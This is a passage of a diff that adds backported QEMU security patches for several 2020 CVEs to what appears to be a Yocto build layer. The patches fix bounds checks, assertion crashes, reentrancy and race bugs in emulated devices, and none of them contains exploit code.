+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-7-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-6.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/921604e175b8ec06c39503310e7b3ec1e3eafe9e]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/spapr_pci.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+--- a/hw/ppc/spapr_pci.c
++++ b/hw/ppc/spapr_pci.c
+@@ -52,6 +52,7 @@
+ #include "sysemu/kvm.h"
+ #include "sysemu/hostmem.h"
+ #include "sysemu/numa.h"
++#include "qemu/log.h"
+
+ /* Copied from the kernel arch/powerpc/platforms/pseries/msi.c */
+ #define RTAS_QUERY_FN 0
+@@ -738,6 +739,12 @@ static PCIINTxRoute spapr_route_intx_pin
+ return route;
+ }
+
++static uint64_t spapr_msi_read(void *opaque, hwaddr addr, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++ return 0;
++}
++
+ /*
+ * MSI/MSIX memory region implementation.
+ * The handler handles both MSI and MSIX.
+@@ -755,8 +762,11 @@ static void spapr_msi_write(void *opaque
+ }
+
+ static const MemoryRegionOps spapr_msi_ops = {
+- /* There is no .read as the read result is undefined by PCI spec */
+- .read = NULL,
++ /*
++ * .read result is undefined by PCI spec.
++ * define .read method to avoid assert failure in memory_region_init_io
++ */
++ .read = spapr_msi_read,
+ .write = spapr_msi_write,
+ .endianness = DEVICE_LITTLE_ENDIAN
+ };
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
new file mode 100644
index 0000000000..7d8ec32251
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
@@ -0,0 +1,50 @@
+From 2c9fb3b784000c1df32231e1c2464bb2e3fc4620 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:31 +0530
+Subject: [PATCH] tz-ppc: add dummy read/write methods
+
+Add tz-ppc-dummy mmio read/write methods to avoid assert failure
+during initialisation.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-8-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-7.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/2c9fb3b784000c1df32231e1c2464bb2e3fc4620 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/tz-ppc.c | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/hw/misc/tz-ppc.c b/hw/misc/tz-ppc.c
+index 6431257..36495c6 100644
+--- a/hw/misc/tz-ppc.c
++++ b/hw/misc/tz-ppc.c
+@@ -196,7 +196,21 @@ static bool tz_ppc_dummy_accepts(void *opaque, hwaddr addr,
+ g_assert_not_reached();
+ }
+
++static uint64_t tz_ppc_dummy_read(void *opaque, hwaddr addr, unsigned size)
++{
++ g_assert_not_reached();
++}
++
++static void tz_ppc_dummy_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ g_assert_not_reached();
++}
++
+ static const MemoryRegionOps tz_ppc_dummy_ops = {
++ /* define r/w methods to avoid assert failure in memory_region_init_io */
++ .read = tz_ppc_dummy_read,
++ .write = tz_ppc_dummy_write,
+ .valid.accepts = tz_ppc_dummy_accepts,
+ };
+
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
new file mode 100644
index 0000000000..7857ba266e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
@@ -0,0 +1,44 @@
+From 735754aaa15a6ed46db51fd731e88331c446ea54 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:32 +0530
+Subject: [PATCH] imx7-ccm: add digprog mmio write method
+
+Add digprog mmio write method to avoid assert failure during
+initialisation.
+
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-9-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-8.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/735754aaa15a6ed46db51fd731e88331c446ea54]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/imx7_ccm.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/misc/imx7_ccm.c b/hw/misc/imx7_ccm.c
+index 02fc1ae..075159e 100644
+--- a/hw/misc/imx7_ccm.c
++++ b/hw/misc/imx7_ccm.c
+@@ -131,8 +131,16 @@ static const struct MemoryRegionOps imx7_set_clr_tog_ops = {
+ },
+ };
+
++static void imx7_digprog_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "Guest write to read-only ANALOG_DIGPROG register\n");
++}
++
+ static const struct MemoryRegionOps imx7_digprog_ops = {
+ .read = imx7_set_clr_tog_read,
++ .write = imx7_digprog_write,
+ .endianness = DEVICE_NATIVE_ENDIAN,
+ .impl = {
+ .min_access_size = 4,
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
new file mode 100644
index 0000000000..0f43adeea8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
@@ -0,0 +1,39 @@
+From 22dc8663d9fc7baa22100544c600b6285a63c7a3 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 22 Jul 2020 16:57:46 +0800
+Subject: [PATCH] net: forbid the reentrant RX
+
+The memory API allows DMA into NIC's MMIO area. This means the NIC's
+RX routine must be reentrant. Instead of auditing all the NIC, we can
+simply detect the reentrancy and return early. The queue->delivering
+is set and cleared by qemu_net_queue_deliver() for other queue helpers
+to know whether the delivering is ongoing (NIC's receive is being
+called). We can check it and return early in qemu_net_queue_flush() to
+forbid reentrant RX.
+
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+CVE: CVE-2020-15859
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/ubuntu/CVE-2020-15859.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/22dc8663d9fc7baa22100544c600b6285a63c7a3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ net/queue.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/net/queue.c b/net/queue.c
+index 0164727..19e32c8 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -250,6 +250,9 @@ void qemu_net_queue_purge(NetQueue *queue, NetClientState *from)
+
+ bool qemu_net_queue_flush(NetQueue *queue)
+ {
++ if (queue->delivering)
++ return false;
++
+ while (!QTAILQ_EMPTY(&queue->packets)) {
+ NetPacket *packet;
+ int ret;
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
new file mode 100644
index 0000000000..e0a27331a8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
@@ -0,0 +1,94 @@
+CVE: CVE-2020-24165
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/886cc68943ebe8cf7e5f970be33459f95068a441 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 886cc68943ebe8cf7e5f970be33459f95068a441 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Alex=20Benn=C3=A9e?= <alex.bennee@linaro.org>
+Date: Fri, 14 Feb 2020 14:49:52 +0000
+Subject: [PATCH] accel/tcg: fix race in cpu_exec_step_atomic (bug 1863025)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The bug describes a race whereby cpu_exec_step_atomic can acquire a TB
+which is invalidated by a tb_flush before we execute it. This doesn't
+affect the other cpu_exec modes as a tb_flush by its nature can only
+occur on a quiescent system. The race was described as:
+
+ B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+ B3. tcg_tb_alloc obtains a new TB
+
+ C3. TB obtained with tb_lookup__cpu_state or tb_gen_code
+ (same TB as B2)
+
+ A3. start_exclusive critical section entered
+ A4. do_tb_flush is called, TB memory freed/re-allocated
+ A5. end_exclusive exits critical section
+
+ B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+ B3. tcg_tb_alloc reallocates TB from B2
+
+ C4. start_exclusive critical section entered
+ C5. cpu_tb_exec executes the TB code that was free in A4
+
+The simplest fix is to widen the exclusive period to include the TB
+lookup. As a result we can drop the complication of checking we are in
+the exclusive region before we end it.
+
+Cc: Yifan <me@yifanlu.com>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1863025
+Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
+Reviewed-by: Richard Henderson <richard.henderson@linaro.org>
+Signed-off-by: Alex Bennée <alex.bennee@linaro.org>
+Message-Id: <20200214144952.15502-1-alex.bennee@linaro.org>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+---
+ accel/tcg/cpu-exec.c | 21 +++++++++++----------
+ 1 file changed, 11 insertions(+), 10 deletions(-)
+
+diff --git a/accel/tcg/cpu-exec.c b/accel/tcg/cpu-exec.c
+index 2560c90eec79..d95c4848a47b 100644
+--- a/accel/tcg/cpu-exec.c
++++ b/accel/tcg/cpu-exec.c
+@@ -240,6 +240,8 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ uint32_t cf_mask = cflags & CF_HASH_MASK;
+
+ if (sigsetjmp(cpu->jmp_env, 0) == 0) {
++ start_exclusive();
++
+ tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, cf_mask);
+ if (tb == NULL) {
+ mmap_lock();
+@@ -247,8 +249,6 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ mmap_unlock();
+ }
+
+- start_exclusive();
+-
+ /* Since we got here, we know that parallel_cpus must be true. */
+ parallel_cpus = false;
+ cc->cpu_exec_enter(cpu);
+@@ -271,14 +271,15 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ qemu_plugin_disable_mem_helpers(cpu);
+ }
+
+- if (cpu_in_exclusive_context(cpu)) {
+- /* We might longjump out of either the codegen or the
+- * execution, so must make sure we only end the exclusive
+- * region if we started it.
+- */
+- parallel_cpus = true;
+- end_exclusive();
+- }
++
++ /*
++ * As we start the exclusive region before codegen we must still
++ * be in the region if we longjump out of either the codegen or
++ * the execution.
++ */
++ g_assert(cpu_in_exclusive_context(cpu));
++ parallel_cpus = true;
++ end_exclusive();
+ }
+
+ struct tb_desc {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
new file mode 100644
index 0000000000..be19256cef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
@@ -0,0 +1,46 @@
+From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 1 Sep 2020 15:22:06 +0200
+Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The 'Transfer Block Size' field is 12-bit wide.
+
+See section '2.2.2. Block Size Register (Offset 004h)' in datasheet.
+
+Two different bug reproducer available:
+- https://bugs.launchpad.net/qemu/+bug/1892960
+- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1
+
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200901140411.112150-3-f4bug@amsat.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25085
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/sd/sdhci.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/sd/sdhci.c
+===================================================================
+--- qemu-4.2.0.orig/hw/sd/sdhci.c
++++ qemu-4.2.0/hw/sd/sdhci.c
+@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset,
+ break;
+ case SDHC_BLKSIZE:
+ if (!TRANSFERRING_DATA(s->prnsts)) {
+- MASKED_WRITE(s->blksize, mask, value);
++ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+ }
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
new file mode 100644
index 0000000000..a46b5be193
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
@@ -0,0 +1,87 @@
+From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001
+From: Guenter Roeck <linux@roeck-us.net>
+Date: Mon, 17 Feb 2020 12:48:10 -0800
+Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI
+ to include file
+
+We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it
+to its include file.
+
+Reviewed-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Guenter Roeck <linux@roeck-us.net>
+Tested-by: Niek Linnenbank <nieklinnenbank@gmail.com>
+Message-id: 20200217204812.9857-2-linux@roeck-us.net
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 15 ---------------
+ hw/usb/hcd-ohci.h | 16 ++++++++++++++++
+ 2 files changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 8a94bd004a..1e6e85e86a 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci)
+ ohci_bus_stop(ohci);
+ }
+
+-#define TYPE_SYSBUS_OHCI "sysbus-ohci"
+-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
+-
+-typedef struct {
+- /*< private >*/
+- SysBusDevice parent_obj;
+- /*< public >*/
+-
+- OHCIState ohci;
+- char *masterbus;
+- uint32_t num_ports;
+- uint32_t firstport;
+- dma_addr_t dma_offset;
+-} OHCISysBusState;
+-
+ static void ohci_realize_pxa(DeviceState *dev, Error **errp)
+ {
+ OHCISysBusState *s = SYSBUS_OHCI(dev);
+diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h
+index 16e3f1e13a..5c8819aedf 100644
+--- a/hw/usb/hcd-ohci.h
++++ b/hw/usb/hcd-ohci.h
+@@ -22,6 +22,7 @@
+ #define HCD_OHCI_H
+
+ #include "sysemu/dma.h"
++#include "hw/usb.h"
+
+ /* Number of Downstream Ports on the root hub: */
+ #define OHCI_MAX_PORTS 15
+@@ -90,6 +91,21 @@ typedef struct OHCIState {
+ void (*ohci_die)(struct OHCIState *ohci);
+ } OHCIState;
+
++#define TYPE_SYSBUS_OHCI "sysbus-ohci"
++#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
++
++typedef struct {
++ /*< private >*/
++ SysBusDevice parent_obj;
++ /*< public >*/
++
++ OHCIState ohci;
++ char *masterbus;
++ uint32_t num_ports;
++ uint32_t firstport;
++ dma_addr_t dma_offset;
++} OHCISysBusState;
++
+ extern const VMStateDescription vmstate_ohci_state;
+
+ void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports,
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
new file mode 100644
index 0000000000..8c1275b2f4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
@@ -0,0 +1,101 @@
+From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:58 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables
+
+While servicing the OHCI transfer descriptors(TD), OHCI host
+controller derives variables 'start_addr', 'end_addr', 'len'
+etc. from values supplied by the host controller driver.
+Host controller driver may supply values such that using
+above variables leads to out-of-bounds access issues.
+Add checks to avoid them.
+
+AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0
+ READ of size 2 at 0x7ffd53af76a0 thread T0
+ #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734
+ #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180
+ #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214
+ #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257
+ #4 timerlist_run_timers ../util/qemu-timer.c:572
+ #5 qemu_clock_run_timers ../util/qemu-timer.c:586
+ #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672
+ #7 main_loop_wait ../util/main-loop.c:527
+ #8 qemu_main_loop ../softmmu/vl.c:1676
+ #9 main ../softmmu/main.c:50
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Reported-by: Yongkang Jia <j_kangel@163.com>
+Reported-by: Yi Ren <yunye.ry@alibaba-inc.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-id: 20200915182259.68522-2-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++--
+ 1 file changed, 22 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 1e6e85e86a..9dc59101f9 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ }
+
+ start_offset = iso_td.offset[relative_frame_number];
+- next_offset = iso_td.offset[relative_frame_number + 1];
++ if (relative_frame_number < frame_count) {
++ next_offset = iso_td.offset[relative_frame_number + 1];
++ } else {
++ next_offset = iso_td.be;
++ }
+
+ if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) ||
+ ((relative_frame_number < frame_count) &&
+@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ }
+ } else {
+ /* Last packet in the ISO TD */
+- end_addr = iso_td.be;
++ end_addr = next_offset;
++ }
++
++ if (start_addr > end_addr) {
++ trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr);
++ return 1;
+ }
+
+ if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) {
+@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ } else {
+ len = end_addr - start_addr + 1;
+ }
++ if (len > sizeof(ohci->usb_buf)) {
++ len = sizeof(ohci->usb_buf);
++ }
+
+ if (len && dir != OHCI_TD_DIR_IN) {
+ if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len,
+@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed)
+ if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) {
+ len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff);
+ } else {
++ if (td.cbp > td.be) {
++ trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be);
++ ohci_die(ohci);
++ return 1;
++ }
+ len = (td.be - td.cbp) + 1;
+ }
++ if (len > sizeof(ohci->usb_buf)) {
++ len = sizeof(ohci->usb_buf);
++ }
+
+ pktlen = len;
+ if (len && dir != OHCI_TD_DIR_IN) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
new file mode 100644
index 0000000000..374d7c4562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
@@ -0,0 +1,42 @@
+From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:59 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire
+
+While servicing OHCI transfer descriptors(TD), ohci_service_iso_td
+retires a TD if it has passed its time frame. It does not check if
+the TD was already processed once and holds an error code in TD_CC.
+It may happen if the TD list has a loop. Add check to avoid an
+infinite loop condition.
+
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-id: 20200915182259.68522-3-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25625
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 9dc59101f9..8b912e95d3 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ the next ISO TD of the same ED */
+ trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number,
+ frame_count);
++ if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) {
++ /* avoid infinite loop */
++ return 1;
++ }
+ OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN);
+ ed->head &= ~OHCI_DPTR_MASK;
+ ed->head |= (iso_td.next & OHCI_DPTR_MASK);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch
new file mode 100644
index 0000000000..e6e0f5ec30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch
@@ -0,0 +1,52 @@
+From 2fdb42d840400d58f2e706ecca82c142b97bcbd6 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Wed, 12 Aug 2020 09:17:27 -0700
+Subject: [PATCH] hw: ehci: check return value of 'usb_packet_map'
+
+If 'usb_packet_map' fails, we should stop to process the usb
+request.
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Message-Id: <20200812161727.29412-1-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=2fdb42d840400d58f2e706ecca82c142b97bcbd6]
+CVE: CVE-2020-25723
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/hcd-ehci.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
+index 58cceac..4da446d 100644
+--- a/hw/usb/hcd-ehci.c
++++ b/hw/usb/hcd-ehci.c
+@@ -1373,7 +1373,10 @@ static int ehci_execute(EHCIPacket *p, const char *action)
+ spd = (p->pid == USB_TOKEN_IN && NLPTR_TBIT(p->qtd.altnext) == 0);
+ usb_packet_setup(&p->packet, p->pid, ep, 0, p->qtdaddr, spd,
+ (p->qtd.token & QTD_TOKEN_IOC) != 0);
+- usb_packet_map(&p->packet, &p->sgl);
++ if (usb_packet_map(&p->packet, &p->sgl)) {
++ qemu_sglist_destroy(&p->sgl);
++ return -1;
++ }
+ p->async = EHCI_ASYNC_INITIALIZED;
+ }
+
+@@ -1453,7 +1456,10 @@ static int ehci_process_itd(EHCIState *ehci,
+ if (ep && ep->type == USB_ENDPOINT_XFER_ISOC) {
+ usb_packet_setup(&ehci->ipacket, pid, ep, 0, addr, false,
+ (itd->transact[i] & ITD_XACT_IOC) != 0);
+- usb_packet_map(&ehci->ipacket, &ehci->isgl);
++ if (usb_packet_map(&ehci->ipacket, &ehci->isgl)) {
++ qemu_sglist_destroy(&ehci->isgl);
++ return -1;
++ }
+ usb_handle_packet(dev, &ehci->ipacket);
+ usb_packet_unmap(&ehci->ipacket, &ehci->isgl);
+ } else {
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
new file mode 100644
index 0000000000..7bfc2beecb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
@@ -0,0 +1,49 @@
+From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 21 Oct 2020 11:35:50 +0530
+Subject: [PATCH] net: remove an assert call in eth_get_gso_type
+
+eth_get_gso_type() routine returns segmentation offload type based on
+L3 protocol type. It calls g_assert_not_reached if L3 protocol is
+unknown, making the following return statement unreachable. Remove the
+g_assert call, it may be triggered by a guest user.
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-27617
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ net/eth.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/net/eth.c b/net/eth.c
+index 0c1d413ee2..1e0821c5f8 100644
+--- a/net/eth.c
++++ b/net/eth.c
+@@ -16,6 +16,7 @@
+ */
+
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "net/eth.h"
+ #include "net/checksum.h"
+ #include "net/tap.h"
+@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto)
+ return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state;
+ }
+ }
+-
+- /* Unsupported offload */
+- g_assert_not_reached();
++ qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, "
++ "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto);
+
+ return VIRTIO_NET_HDR_GSO_NONE | ecn_state;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
new file mode 100644
index 0000000000..e26bc31bbb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
@@ -0,0 +1,73 @@
+From 15222d4636d742f3395fd211fad0cd7e36d9f43e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 10:07:01 +0530
+Subject: [PATCH] CVE-2020-27821
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=4bfb024bc76973d40a359476dc0291f46e435442]
+CVE: CVE-2020-27821
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+memory: clamp cached translation in case it points to an MMIO region
+
+In using the address_space_translate_internal API, address_space_cache_init
+forgot one piece of advice that can be found in the code for
+address_space_translate_internal:
+
+ /* MMIO registers can be expected to perform full-width accesses based only
+ * on their address, without considering adjacent registers that could
